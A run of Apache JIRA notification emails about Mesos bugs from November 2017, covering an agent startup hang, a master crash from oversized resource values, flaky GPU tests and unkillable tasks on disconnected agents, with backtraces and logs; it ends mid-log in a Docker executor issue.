https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250152#comment-16250152
 ] 

Vinod Kone commented on MESOS-8159:
---

[~abudnik] can you take a look?

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
>Priority: Critical
> Fix For: 1.4.1
>
>
> In {{ns::clone}}, the first child call {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8137) Mesos agent can hang during startup.

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8137?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8137:
--
Priority: Critical  (was: Major)

> Mesos agent can hang during startup.
> 
>
> Key: MESOS-8137
> URL: https://issues.apache.org/jira/browse/MESOS-8137
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.4.0
>Reporter: Jie Yu
>Priority: Critical
>
> Environment:
> Linux dcos-agentdisks-as1-1100-2 4.11.0-1011-azure #11-Ubuntu SMP Tue Sep 19 
> 19:03:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
> {noformat}
> #0  __lll_lock_wait_private () at 
> ../sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:95
> #1  0x7f132b856f7b in __malloc_fork_lock_parent () at arena.c:155
> #2  0x7f132b89f5da in __libc_fork () at ../sysdeps/nptl/fork.c:131
> #3  0x7f132b842350 in _IO_new_proc_open (fp=fp@entry=0xf1282b84e0, 
> command=command@entry=0xf1282b6ea8 “logrotate --help > /dev/null”, 
> mode=, mode@entry=0xf1275fb0f2 “r”)
> at iopopen.c:180
> #4  0x7f132b84265c in _IO_new_popen (command=0xf1282b6ea8 “logrotate 
> --help > /dev/null”, mode=0xf1275fb0f2 “r”) at iopopen.c:296
> #5  0x00f1275e622a in Try os::shell<>(std::string 
> const&) ()
> #6  0x7f130fdbae37 in 
> mesos::journald::flags::Flags()::{lambda(std::string 
> const&)#2}::operator()(std::string const&) const (value=..., 
> __closure=)
> at /pkg/src/mesos-modules/journald/lib_journald.hpp:153
> #7  void flags::FlagsBase::add [10], mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2}>(std::string mesos::journald::flags::*, flags::Name const&, 
> Option const&, std::string const&, 
> char const (*) [10], 
> mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2})::{lambda(flags::FlagsBase const&)#3}::operator()(flags::FlagsBase 
> const) const (base=..., __closure=) at 
> /opt/mesosphere/active/mesos/include/stout/flags/flags.hpp:399
> #8  std::_Function_handler (flags::FlagsBase const&), void 
> flags::FlagsBase::add mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2}>(std::string mesos::journald::flags::*, flags::Name const&, 
> Option const&, std::string const&, 
> char const (*) [10], 
> mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2})::{lambda(flags::FlagsBase const&)#3}>::_M_invoke(std::_Any_data 
> const&, flags::FlagsBase const&) (__functor=..., __args#0=...) at 
> /usr/include/c++/4.8/functional:2057
> #9  0x00f1275f1db7 in flags::FlagsBase::load(Multimap Option >&, bool, bool, Option const&) ()
> #10 0x00f1275f395f in flags::FlagsBase::load(std::map std::string, std::less, std::allocator const, std::string> > > const&, bool, Option const&) ()
> #11 0x7f130fdb0adc in __lambda104::operator() (parameters=..., 
> __closure=) at 
> /pkg/src/mesos-modules/journald/lib_journald.cpp:425
> #12 0x7f132d69ed23 in 
> mesos::slave::ContainerLogger::create(Option const&) () from 
> /opt/mesosphere/lib/libmesos-1.4.0.so
> #13 0x7f132d848de5 in 
> mesos::internal::slave::DockerContainerizer::create(mesos::internal::slave::Flags
>  const&, mesos::internal::slave::Fetcher*, 
> Option const&) () from 
> /opt/mesosphere/lib/libmesos-1.4.0.so
> #14 0x7f132d830862 in 
> mesos::internal::slave::Containerizer::create(mesos::internal::slave::Flags 
> const&, bool, mesos::internal::slave::Fetcher*, mesos::SecretResolver*) ()
>from /opt/mesosphere/lib/libmesos-1.4.0.so
> #15 0x00f1275deb68 in main ()
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8137) Mesos agent can hang during startup.

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8137?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250156#comment-16250156
 ] 

Vinod Kone commented on MESOS-8137:
---

[~abudnik] can you take a look at this when you have some time?

> Mesos agent can hang during startup.
> 
>
> Key: MESOS-8137
> URL: https://issues.apache.org/jira/browse/MESOS-8137
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.4.0
>Reporter: Jie Yu
>Priority: Critical
>
> Environment:
> Linux dcos-agentdisks-as1-1100-2 4.11.0-1011-azure #11-Ubuntu SMP Tue Sep 19 
> 19:03:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
> {noformat}
> #0  __lll_lock_wait_private () at 
> ../sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:95
> #1  0x7f132b856f7b in __malloc_fork_lock_parent () at arena.c:155
> #2  0x7f132b89f5da in __libc_fork () at ../sysdeps/nptl/fork.c:131
> #3  0x7f132b842350 in _IO_new_proc_open (fp=fp@entry=0xf1282b84e0, 
> command=command@entry=0xf1282b6ea8 “logrotate --help > /dev/null”, 
> mode=, mode@entry=0xf1275fb0f2 “r”)
> at iopopen.c:180
> #4  0x7f132b84265c in _IO_new_popen (command=0xf1282b6ea8 “logrotate 
> --help > /dev/null”, mode=0xf1275fb0f2 “r”) at iopopen.c:296
> #5  0x00f1275e622a in Try os::shell<>(std::string 
> const&) ()
> #6  0x7f130fdbae37 in 
> mesos::journald::flags::Flags()::{lambda(std::string 
> const&)#2}::operator()(std::string const&) const (value=..., 
> __closure=)
> at /pkg/src/mesos-modules/journald/lib_journald.hpp:153
> #7  void flags::FlagsBase::add [10], mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2}>(std::string mesos::journald::flags::*, flags::Name const&, 
> Option const&, std::string const&, 
> char const (*) [10], 
> mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2})::{lambda(flags::FlagsBase const&)#3}::operator()(flags::FlagsBase 
> const) const (base=..., __closure=) at 
> /opt/mesosphere/active/mesos/include/stout/flags/flags.hpp:399
> #8  std::_Function_handler (flags::FlagsBase const&), void 
> flags::FlagsBase::add mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2}>(std::string mesos::journald::flags::*, flags::Name const&, 
> Option const&, std::string const&, 
> char const (*) [10], 
> mesos::journald::flags::basic_string()::{lambda(std::string 
> const&)#2})::{lambda(flags::FlagsBase const&)#3}>::_M_invoke(std::_Any_data 
> const&, flags::FlagsBase const&) (__functor=..., __args#0=...) at 
> /usr/include/c++/4.8/functional:2057
> #9  0x00f1275f1db7 in flags::FlagsBase::load(Multimap Option >&, bool, bool, Option const&) ()
> #10 0x00f1275f395f in flags::FlagsBase::load(std::map std::string, std::less, std::allocator const, std::string> > > const&, bool, Option const&) ()
> #11 0x7f130fdb0adc in __lambda104::operator() (parameters=..., 
> __closure=) at 
> /pkg/src/mesos-modules/journald/lib_journald.cpp:425
> #12 0x7f132d69ed23 in 
> mesos::slave::ContainerLogger::create(Option const&) () from 
> /opt/mesosphere/lib/libmesos-1.4.0.so
> #13 0x7f132d848de5 in 
> mesos::internal::slave::DockerContainerizer::create(mesos::internal::slave::Flags
>  const&, mesos::internal::slave::Fetcher*, 
> Option const&) () from 
> /opt/mesosphere/lib/libmesos-1.4.0.so
> #14 0x7f132d830862 in 
> mesos::internal::slave::Containerizer::create(mesos::internal::slave::Flags 
> const&, bool, mesos::internal::slave::Fetcher*, mesos::SecretResolver*) ()
>from /opt/mesosphere/lib/libmesos-1.4.0.so
> #15 0x00f1275deb68 in main ()
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8129:
-

Assignee: Benjamin Mahler

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had let to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8123) GPU tests are failing due to TASK_STARTING.

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8123?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8123:
-

Assignee: Alexander Rukletsov

> GPU tests are failing due to TASK_STARTING.
> ---
>
> Key: MESOS-8123
> URL: https://issues.apache.org/jira/browse/MESOS-8123
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jie Yu
>Assignee: Alexander Rukletsov
>
> For instance: NvidiaGpuTest.ROOT_CGROUPS_NVIDIA_GPU_VerifyDeviceAccess
> {noformat}
> I1020 22:18:46.180371  1480 exec.cpp:237] Executor registered on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> I1020 22:18:46.185027  1486 executor.cpp:171] Received SUBSCRIBED event
> I1020 22:18:46.186005  1486 executor.cpp:175] Subscribed executor on core-dev
> I1020 22:18:46.186189  1486 executor.cpp:171] Received LAUNCH event
> I1020 22:18:46.188908  1486 executor.cpp:637] Starting task 
> 3c08cf78-575d-4813-82b6-3ace272db35e
> I1020 22:18:46.192939  1316 slave.cpp:4407] Handling status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fra
> mework ca0e7b44-c621-4442-a62e-15f7bf02064b- from 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.196228  1330 status_update_manager.cpp:323] Received status 
> update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace
> 272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.197510  1329 slave.cpp:4888] Forwarding the update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fram
> ework ca0e7b44-c621-4442-a62e-15f7bf02064b- to master@10.0.49.2:34819
> I1020 22:18:46.197927  1329 slave.cpp:4798] Sending acknowledgement for 
> status update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for 
> task 3c08cf78-575d-4813-82b6-
> 3ace272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b- to 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.198098  1332 master.cpp:6998] Status update TASK_STARTING 
> (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework c
> a0e7b44-c621-4442-a62e-15f7bf02064b- from agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0 at slave(1)@10.0.49.2:34819 (core-dev)
> I1020 22:18:46.198187  1332 master.cpp:7060] Forwarding status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of 
> framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.198463  1332 master.cpp:9162] Updating the state of task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework 
> ca0e7b44-c621-4442-a62e-15f7bf02064b- (latest state:
>  TASK_STARTING, status update state: TASK_STARTING)
> I1020 22:18:46.199198  1331 master.cpp:5566] Processing ACKNOWLEDGE call 
> 87cee290-b2fe-4459-9b75-b9f03aab6492 for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework ca0e7b44-
> c621-4442-a62e-15f7bf02064b- (default) at 
> scheduler-f2b66689-382a-4b8c-bdc9-978cff922409@10.0.49.2:34819 on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> /home/jie/workspace/mesos/src/tests/containerizer/nvidia_gpu_isolator_tests.cpp:142:
>  Failure
>   Expected: TASK_RUNNING
> To be equal to: statusRunning1->state()
>   Which is: TASK_STARTING
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8123) GPU tests are failing due to TASK_STARTING.

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8123?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250161#comment-16250161
 ] 

Vinod Kone commented on MESOS-8123:
---

[~alexr] can you close it?

> GPU tests are failing due to TASK_STARTING.
> ---
>
> Key: MESOS-8123
> URL: https://issues.apache.org/jira/browse/MESOS-8123
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jie Yu
>Assignee: Alexander Rukletsov
>
> For instance: NvidiaGpuTest.ROOT_CGROUPS_NVIDIA_GPU_VerifyDeviceAccess
> {noformat}
> I1020 22:18:46.180371  1480 exec.cpp:237] Executor registered on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> I1020 22:18:46.185027  1486 executor.cpp:171] Received SUBSCRIBED event
> I1020 22:18:46.186005  1486 executor.cpp:175] Subscribed executor on core-dev
> I1020 22:18:46.186189  1486 executor.cpp:171] Received LAUNCH event
> I1020 22:18:46.188908  1486 executor.cpp:637] Starting task 
> 3c08cf78-575d-4813-82b6-3ace272db35e
> I1020 22:18:46.192939  1316 slave.cpp:4407] Handling status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fra
> mework ca0e7b44-c621-4442-a62e-15f7bf02064b- from 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.196228  1330 status_update_manager.cpp:323] Received status 
> update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace
> 272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.197510  1329 slave.cpp:4888] Forwarding the update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fram
> ework ca0e7b44-c621-4442-a62e-15f7bf02064b- to master@10.0.49.2:34819
> I1020 22:18:46.197927  1329 slave.cpp:4798] Sending acknowledgement for 
> status update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for 
> task 3c08cf78-575d-4813-82b6-
> 3ace272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b- to 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.198098  1332 master.cpp:6998] Status update TASK_STARTING 
> (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework c
> a0e7b44-c621-4442-a62e-15f7bf02064b- from agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0 at slave(1)@10.0.49.2:34819 (core-dev)
> I1020 22:18:46.198187  1332 master.cpp:7060] Forwarding status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of 
> framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.198463  1332 master.cpp:9162] Updating the state of task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework 
> ca0e7b44-c621-4442-a62e-15f7bf02064b- (latest state:
>  TASK_STARTING, status update state: TASK_STARTING)
> I1020 22:18:46.199198  1331 master.cpp:5566] Processing ACKNOWLEDGE call 
> 87cee290-b2fe-4459-9b75-b9f03aab6492 for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework ca0e7b44-
> c621-4442-a62e-15f7bf02064b- (default) at 
> scheduler-f2b66689-382a-4b8c-bdc9-978cff922409@10.0.49.2:34819 on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> /home/jie/workspace/mesos/src/tests/containerizer/nvidia_gpu_isolator_tests.cpp:142:
>  Failure
>   Expected: TASK_RUNNING
> To be equal to: statusRunning1->state()
>   Which is: TASK_STARTING
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8111) Mesos sees task as running, but cannot kill it because the agent is offline

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8111?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250166#comment-16250166
 ] 

Vinod Kone commented on MESOS-8111:
---

What framework are you using? I'm assuming marathon because you are using DC/OS.
 
There is a default rate limit of 1 in 20 min in DC/OS for the master to mark a 
disconnected agent as unreachable. If you have a more than one agent disconnect 
/ scaled down at the same time, it would take quite a bit for master to 
recognize that.

Also, can you share the master, scheduler and agent logs for around the 
specific task and during disconnection? That would help us diagnose this better.


> Mesos sees task as running, but cannot kill it because the agent is offline
> ---
>
> Key: MESOS-8111
> URL: https://issues.apache.org/jira/browse/MESOS-8111
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.2.3
> Environment: DC/OS 1.9.4
>Reporter: Cosmin Lehene
>
> After scaling down a cluster, the master is reporting a task as running 
> although the slave has been long gone.
> At the same time it reports it can't kill it because the agent is offline
> {noformat}
> I1018 16:55:22.00  6976 master.cpp:4913] Processing KILL call for task 
> 'spark.7b59a77b-b353-11e7-addd-b29ecbf071e1' of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101
> W1018 16:55:22.00  6976 master.cpp:5000] Cannot kill task 
> spark.7b59a77b-b353-11e7-addd-b29ecbf071e1 of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101 because the 
> agent 4d2a982a-0e62-4471-88e8-8df9cc0ae437-S129 at slave(1)@10.0.0.81:5051 
> (10.0.0.81) is disconnected. Kill will be retried if the agent re-registers
> {noformat}
> Clearly, if the agent is offline the task is also not running. Also not sure 
> waiting indefinitely for an agent to recover is a good strategy.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8111) Mesos sees task as running, but cannot kill it because the agent is offline

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8111?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8111:
-

Assignee: Vinod Kone

> Mesos sees task as running, but cannot kill it because the agent is offline
> ---
>
> Key: MESOS-8111
> URL: https://issues.apache.org/jira/browse/MESOS-8111
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.2.3
> Environment: DC/OS 1.9.4
>Reporter: Cosmin Lehene
>Assignee: Vinod Kone
>
> After scaling down a cluster, the master is reporting a task as running 
> although the slave has been long gone.
> At the same time it reports it can't kill it because the agent is offline
> {noformat}
> I1018 16:55:22.00  6976 master.cpp:4913] Processing KILL call for task 
> 'spark.7b59a77b-b353-11e7-addd-b29ecbf071e1' of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101
> W1018 16:55:22.00  6976 master.cpp:5000] Cannot kill task 
> spark.7b59a77b-b353-11e7-addd-b29ecbf071e1 of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101 because the 
> agent 4d2a982a-0e62-4471-88e8-8df9cc0ae437-S129 at slave(1)@10.0.0.81:5051 
> (10.0.0.81) is disconnected. Kill will be retried if the agent re-registers
> {noformat}
> Clearly, if the agent is offline the task is also not running. Also not sure 
> waiting indefinitely for an agent to recover is a good strategy.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8123) GPU tests are failing due to TASK_STARTING.

2017-11-13 Thread Alexander Rukletsov (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8123?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Alexander Rukletsov updated MESOS-8123:
---
Shepherd: Jie Yu
Story Points: 1
  Labels: flaky-test mesosphere  (was: )
 Component/s: test

> GPU tests are failing due to TASK_STARTING.
> ---
>
> Key: MESOS-8123
> URL: https://issues.apache.org/jira/browse/MESOS-8123
> Project: Mesos
>  Issue Type: Bug
>  Components: test
>Reporter: Jie Yu
>Assignee: Alexander Rukletsov
>  Labels: flaky-test, mesosphere
>
> For instance: NvidiaGpuTest.ROOT_CGROUPS_NVIDIA_GPU_VerifyDeviceAccess
> {noformat}
> I1020 22:18:46.180371  1480 exec.cpp:237] Executor registered on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> I1020 22:18:46.185027  1486 executor.cpp:171] Received SUBSCRIBED event
> I1020 22:18:46.186005  1486 executor.cpp:175] Subscribed executor on core-dev
> I1020 22:18:46.186189  1486 executor.cpp:171] Received LAUNCH event
> I1020 22:18:46.188908  1486 executor.cpp:637] Starting task 
> 3c08cf78-575d-4813-82b6-3ace272db35e
> I1020 22:18:46.192939  1316 slave.cpp:4407] Handling status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fra
> mework ca0e7b44-c621-4442-a62e-15f7bf02064b- from 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.196228  1330 status_update_manager.cpp:323] Received status 
> update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace
> 272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.197510  1329 slave.cpp:4888] Forwarding the update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fram
> ework ca0e7b44-c621-4442-a62e-15f7bf02064b- to master@10.0.49.2:34819
> I1020 22:18:46.197927  1329 slave.cpp:4798] Sending acknowledgement for 
> status update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for 
> task 3c08cf78-575d-4813-82b6-
> 3ace272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b- to 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.198098  1332 master.cpp:6998] Status update TASK_STARTING 
> (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework c
> a0e7b44-c621-4442-a62e-15f7bf02064b- from agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0 at slave(1)@10.0.49.2:34819 (core-dev)
> I1020 22:18:46.198187  1332 master.cpp:7060] Forwarding status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of 
> framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.198463  1332 master.cpp:9162] Updating the state of task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework 
> ca0e7b44-c621-4442-a62e-15f7bf02064b- (latest state:
>  TASK_STARTING, status update state: TASK_STARTING)
> I1020 22:18:46.199198  1331 master.cpp:5566] Processing ACKNOWLEDGE call 
> 87cee290-b2fe-4459-9b75-b9f03aab6492 for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework ca0e7b44-
> c621-4442-a62e-15f7bf02064b- (default) at 
> scheduler-f2b66689-382a-4b8c-bdc9-978cff922409@10.0.49.2:34819 on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> /home/jie/workspace/mesos/src/tests/containerizer/nvidia_gpu_isolator_tests.cpp:142:
>  Failure
>   Expected: TASK_RUNNING
> To be equal to: statusRunning1->state()
>   Which is: TASK_STARTING
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8105) Docker containerizer fails with "Unable to get executor pid after launch"

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8105?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8105:
-

Assignee: Jie Yu

> Docker containerizer fails with "Unable to get executor pid after launch"
> -
>
> Key: MESOS-8105
> URL: https://issues.apache.org/jira/browse/MESOS-8105
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: maybob
>Assignee: Jie Yu
>  Labels: docker
>
> When running lots of command at the same time by each command using same 
> executor with different executorId by docker,some executor occur error 
> "Unable to get executor pid after launch". 
> Reason of this error may be "docker inspect" hangs or exit 0 with pid 0. 
> Another reason may be lots of docker consume many resources, e.g file 
> descriptor.
> {color:red}Log:{color}
> {code:java}
> I1012 16:15:01.003931 124081 slave.cpp:1619] Got assigned task '920860' for 
> framework framework-id-daily
> I1012 16:15:01.006091 124081 slave.cpp:1900] Authorizing task '920860' for 
> framework framework-id-daily
> I1012 16:15:01.008281 124081 slave.cpp:2087] Launching task '920860' for 
> framework framework-id-daily
> I1012 16:15:01.008779 124081 paths.cpp:573] Trying to chown 
> '/volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3'
>  to user 'maybob'
> I1012 16:15:01.009027 124081 slave.cpp:7401] Checkpointing ExecutorInfo to 
> '/volumes/sdb1/mesos/meta/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/executor.info'
> I1012 16:15:01.009546 124081 slave.cpp:7038] Launching executor 
> 'Executor_920860' of framework framework-id-daily with resources {} in work 
> directory 
> '/volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3'
> I1012 16:15:01.010339 124081 slave.cpp:7429] Checkpointing TaskInfo to 
> '/volumes/sdb1/mesos/meta/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3/tasks/920860/task.info'
> I1012 16:15:01.010726 124081 slave.cpp:2316] Queued task '920860' for 
> executor 'Executor_920860' of framework framework-id-daily
> I1012 16:15:01.011740 124088 docker.cpp:1175] Starting container 
> '29c82b61-1242-4de9-80cf-16f46c30e7e3' for executor 'Executor_920860' and 
> framework framework-id-daily
> I1012 16:15:01.013123 124081 slave.cpp:877] Successfully attached file 
